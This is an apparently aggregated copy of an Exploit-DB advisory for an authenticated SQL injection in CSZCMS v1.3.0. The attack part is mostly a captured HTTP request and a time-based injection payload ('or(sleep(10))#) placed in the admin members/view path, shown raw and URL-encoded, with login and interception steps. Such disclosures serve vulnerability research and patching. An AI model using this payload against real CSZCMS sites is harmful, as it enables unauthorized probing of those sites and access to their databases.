3

[webapps] CSZCMS v1.3.0 - SQL Injection (Authenticated)

 1 month ago
source link: https://www.exploit-db.com/exploits/51916
Go to the source link to view the article. You can view the picture content, updated content and better typesetting reading experience. If the link is broken, please click the button below to view the snapshot at that time.

CSZCMS v1.3.0 - SQL Injection (Authenticated)

EDB-ID:

51916

EDB Verified:

Platform:

PHP

Date:

2024-03-20

Vulnerable App:

# Title:  CSZCMS v1.3.0 - SQL Injection (Authenticated)
# Author: Abdulaziz Almetairy
# Date: 27/01/2024
# Vendor: https://www.cszcms.com/
# Software: https://sourceforge.net/projects/cszcms/files/install/CSZCMS-V1.3.0.zip/download
# Reference: https://github.com/oh-az
# Tested on: Windows 11, MySQL, Apache


# 1 - Log in to the admin portal

http://localhost/cszcms/admin/login

# 2 - Navigate to General Menu > Member Users.

# 3 Click the 'View' button next to any username.

# 4 Intercept the request

GET /cszcms/admin/members/view/1 HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Cookie: 86112035d26bb3c291899278f9ab4fb2_cszsess=n5v1jcdqfjuuo32ng66e4rttg65ugdss
Upgrade-Insecure-Requests: 1



# 5 Modify the paramter 

/cszcms/admin/members/view/1

to 

/cszcms/admin/members/view/'or(sleep(10))#

and url encode all characters

/cszcms/admin/members/view/%27%6f%72%28%73%6c%65%65%70%28%31%30%29%29%23%20

report

Recommend

About Joyk


Aggregate valuable and interesting links.
Joyk means Joy of geeK